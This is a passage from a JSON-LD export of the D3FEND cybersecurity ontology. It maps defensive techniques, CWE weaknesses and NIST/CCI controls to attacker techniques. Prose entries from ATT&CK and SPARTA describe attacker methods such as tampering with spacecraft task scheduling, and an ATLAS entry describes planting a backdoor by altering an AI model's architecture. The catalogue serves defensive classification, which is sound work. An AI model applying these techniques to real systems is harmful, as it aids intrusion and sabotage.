      "@id": "_:Nda10afb67f8e4d309e1204f6b7c64810",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      }
    },
    {
      "@id": "d3f:DomainAccountMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainAccountMonitoring"
      ],
      "d3f:d3fend-id": "D3-DAM",
      "d3f:definition": "Monitoring the existence of or changes to Domain User Accounts.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-AuditUserAccountManagement"
      },
      "d3f:monitors": {
        "@id": "d3f:DomainUserAccount"
      },
      "rdfs:label": "Domain Account Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N4917db4f05204a9385c1af0c29225006"
        }
      ]
    },
    {
      "@id": "_:N4917db4f05204a9385c1af0c29225006",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:REC-0009",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0009",
      "d3f:definition": "Adversaries compile a CONOPS-level portrait of the mission to predict priorities, constraints, and operational rhythms. They harvest stated needs, goals, and performance measures; enumerate key elements/instruments and their duty cycles; and extract mode logic, operational constraints (pointing, keep-outs, contamination, thermal/power margins), and contingency concepts. They mine the scientific and engineering basis, papers, algorithms, calibration methods, to anticipate data value, processing chains, and where integrity or availability attacks would have maximal effect. They correlate physical and support environments (ground networks, cloud pipelines, data distribution partners, user communities) and public schedules (campaigns, calibrations, maneuvers) to identify periods of elevated workload or reduced margin. The aim is not merely understanding but timing: choosing moments when authentication might be relaxed, monitoring is saturated, or rapid-response authority is invoked.",
      "rdfs:label": "Gather Mission Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0009/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Mission Information"
    },
    {
      "@id": "d3f:EX-0012.05",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.05",
      "d3f:definition": "Spacecraft typically rely on real-time scheduling, fixed-priority or deadline/periodic schemes, driven by timers, tick sources, and per-task parameters. Threat actors target these parameters and associated tables to skew execution order and timing. Edits may change priorities, periods, or deadlines; adjust CPU budgets and watchdog thresholds; alter ready-queue disciplines; or reconfigure timer tick rates and clock sources. They may also modify task affinities, message-queue depths, and interrupt masks so preemption and latency characteristics shift. Small changes can have large effects: high-rate control loops see added jitter, estimator updates miss deadlines, command/telemetry handling starves, or low-priority maintenance tasks monopolize cores due to mis-set periods.  Manipulated schedules can create intermittent, state-dependent malfunctions that are hard to distinguish from environmental load. The essence of the technique is to weaponize time, reshaping when work happens so that otherwise correct code produces unsafe or exploitable behavior.",
      "rdfs:label": "Scheduling Algorithm - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/05/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Scheduling Algorithm"
    },
    {
      "@id": "d3f:has-participant",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-participant y: The event x involves an object y as a participant, indicating that y plays some role in the event, whether actively, passively, or otherwise.",
      "owl:inverseOf": {
        "@id": "d3f:participates-in"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://purl.obolibrary.org/obo/BFO_0000057"
      },
      "rdfs:label": "has-participant",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-NIST-SP-800-53-R5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf"
      },
      "d3f:kb-abstract": "This publication provides a catalog of security and privacy controls for information systems and organizations to protect organizational operations and assets, individuals, other organizations, and the Nation from a diverse set of threats and risks, including hostile attacks, human errors, natural disasters, structural failures, foreign intelligence entities, and privacy risks. The controls are flexible and customizable and implemented as part of an organization-wide process to manage risk. The controls address diverse requirements derived from mission and business needs, laws, executive orders, directives, regulations, policies, standards, and guidelines. Finally, the consolidated control catalog addresses security and privacy from a functionality perspective (i.e., the strength of functions and mechanisms provided by the controls) and from an assurance perspective (i.e., the measure of confidence in the security or privacy capability provided by the controls). Addressing functionality and assurance helps to ensure that information technology products and the systems that rely on those products are sufficiently trustworthy",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:PhysicalAccessMonitoring"
      },
      "d3f:kb-reference-title": "NIST Special Publication 800-53 Revision 5: Security and Privacy Controls for Information Systems and Organizations",
      "rdfs:label": "Reference - NIST Special Publication 800-53 Revision 5: Security and Privacy Controls for Information Systems and Organizations"
    },
    {
      "@id": "d3f:CCI-002385_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects against or limits the effects of organization-defined types of denial of service attacks by employing organization-defined security safeguards.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002385"
    },
    {
      "@id": "d3f:DHCPNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "DHCP Network Traffic is network traffic related to the DHCP protocol, used by network nodes to negotiate and configure either IPv4 or IPv6 addresses.",
      "rdfs:label": "DHCP Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1623",
      "@type": "owl:Class",
      "d3f:attack-id": "T1623",
      "d3f:definition": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, Android is a UNIX-like OS and includes a basic [Unix Shell](https://attack.mitre.org/techniques/T1623/001) that can be accessed via the Android Debug Bridge (ADB) or Java’s `Runtime` package.",
      "rdfs:label": "Command and Scripting Interpreter - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileExecutionTechnique"
      },
      "skos:prefLabel": "Command and Scripting Interpreter"
    },
    {
      "@id": "d3f:DifferentialVolumeSnapshot",
      "@type": "owl:Class",
      "d3f:definition": "A differential volume snapshot is a point-in-time capture of the files and directories that were changed since the last full snapshot.",
      "rdfs:label": "Differential Volume Snapshot",
      "rdfs:seeAlso": {
        "@id": "https://aws.amazon.com/compare/the-difference-between-incremental-differential-and-other-backups/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:VolumeSnapshot"
      }
    },
    {
      "@id": "d3f:AtomicClock",
      "@type": "owl:Class",
      "d3f:definition": "An atomic clock is a clock that measures time by monitoring the resonant frequency of atoms.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Atomic_clock"
      },
      "rdfs:label": "Atomic Clock",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareClock"
      }
    },
    {
      "@id": "d3f:CWE-1125",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1125",
      "d3f:definition": "The product has an attack surface whose quantitative measurement exceeds a desirable maximum.",
      "rdfs:label": "Excessive Attack Surface",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:DiskErasure",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DiskErasure"
      ],
      "d3f:d3fend-id": "D3-DKE",
      "d3f:definition": "Disk Erasure is the process of securely deleting all data on a disk to ensure that it cannot be recovered by any means.",
      "d3f:erases": {
        "@id": "d3f:SecondaryStorage"
      },
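      "d3f:kb-article": "### How it works\n\nDisk Erasure involves overwriting the existing data with random or specific patterns multiple times. Disk erasure is crucial for data sanitization, ensuring that sensitive information is completely removed from storage devices before they are repurposed, disposed of, or transferred to another party. On flash-based media such as SSDs, overwriting from the host may not reach remapped or over-provisioned blocks, so the device's own sanitize or cryptographic-erase function is generally needed to meet the same goal.",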
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Remembranceofdatapassed:Astudyofdisksanitizationpractices"
      },
      "rdfs:label": "Disk Erasure",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiskFormatting"
        },
        {
          "@id": "_:N5c5824ec54d64a5bbaa451785eb58737"
        }
      ]
    },
    {
      "@id": "_:N5c5824ec54d64a5bbaa451785eb58737",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:erases"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Restrictions for Change",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        }
      ],
      "rdfs:label": "CM-5"
    },
    {
      "@id": "d3f:T1490",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1490",
      "d3f:definition": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.",
      "d3f:modifies": [
        {
          "@id": "d3f:OperatingSystemConfiguration"
        },
        {
          "@id": "d3f:SystemServiceSoftware"
        }
      ],
      "rdfs:label": "Inhibit System Recovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImpactTechnique"
        },
        {
          "@id": "_:N92351551c00743008d1fe581c3c5b28f"
        },
        {
          "@id": "_:Nceac9c8eadd24dbab5c86eef80515c69"
        }
      ]
    },
    {
      "@id": "_:N92351551c00743008d1fe581c3c5b28f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfiguration"
      }
    },
    {
      "@id": "_:Nceac9c8eadd24dbab5c86eef80515c69",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemServiceSoftware"
      }
    },
    {
      "@id": "d3f:PythonScriptFile",
      "@type": "owl:Class",
      "d3f:synonym": "A script file written in the Python programming language.",
      "rdfs:label": "Python Script File",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:CWE-555",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-555",
      "d3f:definition": "The J2EE application stores a plaintext password in a configuration file.",
      "rdfs:label": "J2EE Misconfiguration: Plaintext Password in Configuration File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-260"
      }
    },
    {
      "@id": "d3f:CWE-804",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-804",
      "d3f:definition": "The product uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor.",
      "rdfs:label": "Guessable CAPTCHA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-863"
        }
      ]
    },
    {
      "@id": "d3f:SourceCodeHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-SCH",
      "d3f:definition": "Hardening source code with the intention of making it more difficult to exploit and less error prone.",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "rdfs:label": "Source Code Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Ne49e9250c6f347bb9544764b8ddb52dd"
        }
      ]
    },
    {
      "@id": "_:Ne49e9250c6f347bb9544764b8ddb52dd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "d3f:T1223",
      "@type": "owl:Class",
      "d3f:attack-id": "T1223",
      "d3f:definition": "Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such as VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.001",
      "rdfs:label": "Compiled HTML File",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-357",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-357",
      "d3f:definition": "The user interface provides a warning to a user regarding dangerous or sensitive operations, but the warning is not noticeable enough to warrant attention.",
      "rdfs:label": "Insufficient UI Warning of Dangerous Operations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CCI-001200_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs cryptographic mechanisms to prevent unauthorized disclosure of information at rest unless otherwise protected by alternative physical measures.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001200"
    },
    {
      "@id": "d3f:InboundInternetEncryptedTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Inbound internet encrypted traffic is encrypted network traffic on an incoming connection initiated from a host outside the network to a host within a network.",
      "rdfs:label": "Inbound Internet Encrypted Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:DigitalSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A digital system is a group of interacting or interrelated digital artifacts that act according to a set of rules to form a unified whole. A digital system, surrounded and influenced by its environment, is described by its boundaries, structure and purpose and expressed in its functioning. Systems are the subjects of study of systems theory.",
      "rdfs:label": "Digital System",
      "rdfs:seeAlso": {
        "@id": "dbr:System"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "d3f:System"
        }
      ]
    },
    {
      "@id": "d3f:counters",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "counters",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-counter"
      }
    },
    {
      "@id": "d3f:SpearmansRankCorrelationCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SRCC",
      "d3f:synonym": "Spearman's Rho",
      "rdfs:label": "Spearman's Rank Correlation Coefficient",
      "rdfs:subClassOf": {
        "@id": "d3f:RankCorrelationCoefficient"
      }
    },
    {
      "@id": "d3f:ContainerOrchestrationSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A d3f:Software which manages and coordinates running one or more d3f:ContainerProcess.",
      "d3f:manages": {
        "@id": "d3f:ContainerProcess"
      },
      "rdfs:label": "Container Orchestration Software",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N28524ffaaf694671b0ed8e21e8a25a5b"
        }
      ]
    },
    {
      "@id": "_:N28524ffaaf694671b0ed8e21e8a25a5b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContainerProcess"
      }
    },
    {
      "@id": "d3f:LinuxOpenAt2ArgumentO_RDONLY-O_WRONLY-O_RDWR",
      "@type": "owl:Class",
      "d3f:definition": "Extension of Linux Openat.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/openat2.2.html"
      },
      "rdfs:label": "Linux OpenAt2 Argument O_RDONLY, O_WRONLY, O_RDWR",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIOpenFile"
      }
    },
    {
      "@id": "d3f:CWE-421",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-421",
      "d3f:definition": "The product opens an alternate channel to communicate with an authorized user, but the channel is accessible to other actors.",
      "rdfs:label": "Race Condition During Access to Alternate Channel",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-362"
        },
        {
          "@id": "d3f:CWE-420"
        }
      ]
    },
    {
      "@id": "d3f:T0880",
      "@type": "owl:Class",
      "d3f:attack-id": "T0880",
      "d3f:definition": "Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur. Safety systems are often composed of the same elements as control systems but have the sole purpose of ensuring the process fails in a predetermined safe manner.",
      "rdfs:label": "Loss of Safety - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of Safety"
    },
    {
      "@id": "d3f:CWE-775",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-775",
      "d3f:definition": "The product does not release a file descriptor or handle after its effective lifetime has ended, i.e., after the file descriptor/handle is no longer needed.",
      "rdfs:label": "Missing Release of File Descriptor or Handle after Effective Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-772"
      }
    },
    {
      "@id": "d3f:Pix2Pix",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PIX",
      "d3f:definition": "Pix2Pix is based on a conditional GAN architecture and is trained on paired sets of images or scenes from two domains to be used for translation.",
      "d3f:kb-article": "## References\nEsri. (n.d.). How Pix2Pix Works. [Link](https://developers.arcgis.com/python/guide/how-pix2pix-works/)",
      "rdfs:label": "Pix2Pix",
      "rdfs:subClassOf": {
        "@id": "d3f:Image-to-ImageTranslationGAN"
      }
    },
    {
      "@id": "d3f:DS0023",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it.",
      "d3f:exactly": {
        "@id": "d3f:NamedPipe"
      },
      "rdfs:label": "Named Pipe (ATT&CK DS)"
    },
    {
      "@id": "d3f:Reference-NIST-Special-Publication-800-37-Revision-2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.SP.800-37r2"
      },
      "d3f:kb-abstract": "This publication describes the Risk Management Framework (RMF) and provides guidelines for applying the RMF to information systems and organizations. The RMF provides a disciplined, structured, and flexible process for managing security and privacy risk that includes information security categorization; control selection, implementation, and assessment; system and common control authorizations; and continuous monitoring. The RMF includes activities to prepare organizations to execute the framework at appropriate risk management levels. The RMF also promotes near real-time risk management and ongoing information system and common control authorization through the implementation of continuous monitoring processes; provides senior leaders and executives with the necessary information to make efficient, cost-effective, risk management decisions about the systems supporting their missions and business functions; and incorporates security and privacy into the system development life cycle. Executing the RMF tasks links essential risk management processes at the system level to risk management processes at the organization level. In addition, it establishes responsibility and accountability for the controls implemented within an organization’s information systems and inherited by those systems.",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "NIST Special Publication 800-37 Revision 2 - Risk Management Framework for Information Systems and Organizations",
      "rdfs:label": "Reference - NIST Special Publication 800-37 Revision 2 - Risk Management Framework for Information Systems and Organizations"
    },
    {
      "@id": "d3f:CWE-697",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-697",
      "d3f:definition": "The product compares two entities in a security-relevant context, but the comparison is incorrect, which may lead to resultant weaknesses.",
      "rdfs:label": "Incorrect Comparison",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:Reference-LibreNMSDocsNetworkMapExtension",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.librenms.org/Extensions/Network-Map/"
      },
      "d3f:kb-abstract": "LibreNMS has the ability to show you a network map based on:\n* xDP Discovery\n* MAC addresses",
      "d3f:kb-organization": "LibreNMS.org",
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkMapping"
      },
      "d3f:kb-reference-title": "Libre NMS - Network Map Extension",
      "rdfs:label": "Reference - Libre NMS - Network Map Extension"
    },
    {
      "@id": "d3f:CWE-495",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-495",
      "d3f:definition": "The product has a method that is declared public, but returns a reference to a private data structure, which could then be modified in unexpected ways.",
      "rdfs:label": "Private Data Structure Returned From A Public Method",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CCI-000195_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for password-based authentication, when new passwords are created, enforces that at least an organization-defined number of characters are changed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000195"
    },
    {
      "@id": "d3f:CWE-77",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-77",
      "d3f:definition": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.",
      "d3f:synonym": "Command injection",
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Improper Neutralization of Special Elements used in a Command ('Command Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-74"
        },
        {
          "@id": "_:N59c53ad43ecd4b8da6b58e778b402a51"
        }
      ]
    },
    {
      "@id": "_:N59c53ad43ecd4b8da6b58e778b402a51",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:Classification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CLA",
      "d3f:definition": "Classification uses an algorithm to accurately assign test data into specific categories.",
      "d3f:kb-article": "## How it works\nClassification recognizes specific entities within the dataset and attempts to draw some conclusions on how those entities should be labeled or defined. Common classification algorithms are linear classifiers, support vector machines (SVM), decision trees, k-nearest neighbor, and random forest, which are described in more detail below.\n\n## Considerations:\n\nThere are many different types of classification algorithms for modeling classification predictive modeling problems.\n\nThere is no single theory on how to map algorithms onto problem types; instead, it is generally recommended that a practitioner use controlled experiments and discover which algorithm and algorithm configuration results in the best performance for a given classification task.\n\n## Key Test Considerations\n\n- **Machine Learning**:\n\n  - **Verify the dataset quality**: Check the data to make sure it is\n      free of errors.  Quantify the degree of missing values,\n      outliers, and noise in the data collection.  If the data quality\n      is low, it may be difficult or impossible to create models and\n      systems with the desired performance.\n\n  - **Verify development datasets are representative** of expected\n      operational environment and data collection means.  
Compare\n      distributions of dataset features and labels with exploratory\n      data analysis and assess the difference in tests on training\n      data and tests on evaluation data (where the evaluation data\n      must be drawn from a representative dataset.)\n\n  - **Use software libraries**: and tools built for ML where possible, so\n      that the underlying code is verified by prior use.**\n\n  - **Diagnose model errors with domain SMEs**: Have problem domain\n    SMEs investigate model errors for conditions for which the model\n    may underperform and suggest refinements.\n\n- **Classification**:\n\n  - **Use Standard Classification Performance Measures**: Not all of\n      the following may be necessary, but should be considered for\n      both verification (developmental test) and operational test\n      stages use:\n\n    - **Accuracy**: The fraction of predictions that were corret.\n\n    - **Precision**: The proportion of positive identifications that were correct.\n\n    - **Recall**: The proportion of actual positive cases identified correctly.\n\n    - **F-Measure**: Combines the preicion and recall into a single\n        score.  It is the harmonic mean of the precision and recall.\n\n    - **Receiver Operating Characteristic (ROC) Curve**: A ROC curve\n        shows the performance of a classification model at all\n        classification thresholds.  It graphs the True Positive Rate\n        over the False Positive Rate.\n\n    - **Area Under the ROC Curve (AUC)**: This measures the\n        two-dimensional area under the ROC Curve.  AUC is\n        scale-invariant and classification-threshold invariant.\n\n    - **ROC TP vs FP points**: In addition to a specific AUC score,\n        the performance at points\n\n    - **Confusion Matrix**: A confusion matrix is a table layout that\n        allows the visualization of the performance of an\n        algorithm. 
Each row of the matrix represents the instances in\n        an actual class while each column represents the instances in\n        a predicted class, or vice versa. It is a special kind of\n        contingency table, with two dimensions (\"actual\" and\n        \"predicted\"), and identical sets of \"classes\" in both\n        dimensions (each combination of dimension and class is a\n        variable in the contingency table.)\n\n  - **Prediction Bias**: The difference between the average of the\n      predicted labels and the average of the labels in the data\n      set.  One should check for prediction bias when evaluating the\n      classifier's results. Causes of bias can include:\n\n    - **Noisy data set**: Errors in original data can as the\n      collection method may have an underlying bias.\n\n    - **Processing bug**: Errors in the data pipeline can\n      introduce bias.\n\n    - **Biased training sample (unbalanced samples)**: Model\n      parameters may be skewed towards majority classes.\n\n\t- **Overly strong regularization**: Model may be underfitting\n        model and too simple.\n\n\t- **Proxy variables**: Model features may be highly\n        correlated.\n\n  - **Overfitting and Underfitting**: Overfitting occurs when the the\n    model built corresponds too closely or exactly to a particular\n    set of data, and thus may fail to fit to predict additional data\n    reliably. An overfitted model is a mathematical model that\n    contains more parameters than can be justified by the data.\n    Underfitting occurs when the model built does adequately capture\n    the patterns in the data. 
As an example, a linear model will\n    underfit a non-linear dataset.\n\n## Platforms, Tools, or Libraries:\n\n- **Python**:\n\n  - **scikit-learn**: Is a free software machine learning library for\n      Python and includes features for classification.\n\n  - **TensorFlow**: is an end-to-end source machine learning\n    platform.\n\n  - **Keras**: is an open-source library that provides a Python API\n    designed to enable fast experimentation with deep neural networks.\n\n  - **PyTorch**: Is a machine learning framework based on the Torch\n    library.\n\n- **R**:\n\n  - **caret**: Classification And REgression Training package contains\n      functions to streamline model training for complex regression\n      and classification problems.\n\n  - **randomForest**: Implementation of classification and regression\n      based on forest of trees.\n\n## References\n\n1. Supervised Learning. IBM.\n[Link](https://www.ibm.com/topics/supervised-learning).\n\n1. Types of Classification in Machine Learning. Machine Learning Mastery.\n[Link](https://machinelearningmastery.com/types-of-classification-in-machine-learning/).\n\n1. Google. (18 July 2022). Classification: Precision and Recall.\n[Link](https://developers.google.com/machine-learning/crash-course/classification/precision-and-recall).\n\n1. Wikipedia. (18 Aug 2023). Overfitting.\n[Link](https://en.wikipedia.org/wiki/Overfitting).\n\n1. Wikipedia. (19 Aug 2023). Confusion matrix.\n[Link](https://en.wikipedia.org/wiki/Confusion_matrix).",
      "rdfs:label": "Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:SupervisedLearning"
      }
    },
    {
      "@id": "d3f:T1596.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596.003",
      "d3f:definition": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.",
      "rdfs:label": "Digital Certificates",
      "rdfs:subClassOf": {
        "@id": "d3f:T1596"
      }
    },
    {
      "@id": "d3f:AML.T0018.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0018.001",
      "d3f:definition": "Adversaries may directly modify an AI model's architecture to re-define its behavior. This can include adding or removing layers as well as adding pre or post-processing operations.\n\nThe effects could include removing the ability to predict certain classes, adding erroneous operations to increase computation costs, or degrading performance. Additionally, a separate adversary-defined network could be injected into the computation graph, which can change the behavior based on the inputs, effectively creating a backdoor.",
      "rdfs:label": "Modify AI Model Architecture - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0018.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0018"
      },
      "skos:prefLabel": "Modify AI Model Architecture"
    },
    {
      "@id": "d3f:DecoyPersona",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyPersona"
      ],
      "d3f:d3fend-id": "D3-DP",
      "d3f:definition": "Establishing a fake online identity to misdirect, deceive, and/or interact with adversaries.",
